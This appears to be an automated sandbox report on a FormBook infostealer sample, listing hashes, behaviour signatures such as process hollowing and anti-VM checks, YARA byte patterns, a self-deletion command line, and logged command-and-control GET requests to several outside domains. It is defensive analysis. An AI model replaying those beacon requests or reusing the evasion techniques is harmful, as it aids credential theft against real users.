Play interactive tourEdit tour

# Analysis Report NQQWym075C.exe

## Overview

### General Information

 Sample Name: NQQWym075C.exe Analysis ID: 321308 MD5: bf75ed61e1b1f7b310ec1d999077c4dd SHA1: cdced77e176e38ff459cdea08941de26861647cd SHA256: 69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2 Tags: exeFormbook Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64NQQWym075C.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)RegAsm.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)wlanext.exe (PID: 1844 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)cmd.exe (PID: 808 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cscript.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)NQQWym075C.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)RegAsm.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x16679:\$sqlite3step: 68 34 1C 7B E1
• 0x1678c:\$sqlite3step: 68 34 1C 7B E1
• 0x166a8:\$sqlite3text: 68 38 2A 90 C5
• 0x167cd:\$sqlite3text: 68 38 2A 90 C5
• 0x166bb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x167e3:\$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 34 entries
SourceRuleDescriptionAuthorStrings
2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.RegAsm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x16679:\$sqlite3step: 68 34 1C 7B E1
• 0x1678c:\$sqlite3step: 68 34 1C 7B E1
• 0x166a8:\$sqlite3text: 68 38 2A 90 C5
• 0x167cd:\$sqlite3text: 68 38 2A 90 C5
• 0x166bb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x167e3:\$sqlite3blob: 68 53 D8 7F 8C
2.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.RegAsm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x77c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x7b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13855:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x13341:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x13957:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x13acf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x856a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x125bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x92e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18947:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x199ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 13 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for submitted file Show sources
 Source: NQQWym075C.exe Virustotal: Detection: 30% Perma Link Source: NQQWym075C.exe ReversingLabs: Detection: 48%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: NQQWym075C.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 2.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 5.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop ebx 2_2_00406899 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop ebx 5_2_00406899 Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop ebx 6_2_03246899 Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop ebx 10_2_02966899

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49728 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49731 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 35.186.238.101:80 -> 192.168.2.3:49744 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49745
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 35.186.238.101 35.186.238.101 Source: Joe Sandbox View IP Address: 198.49.23.141 198.49.23.141 Source: Joe Sandbox View IP Address: 23.227.38.64 23.227.38.64
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS Source: Joe Sandbox View ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
 Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.ussouthernhome.com
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:14:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:03:34 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 404 Error - Page Not Found
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp String found in binary or memory: http://www.sz360buy.com/d Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp String found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmp String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

### System Summary:

 Malicious sample detected (through community Yara rule) Show sources
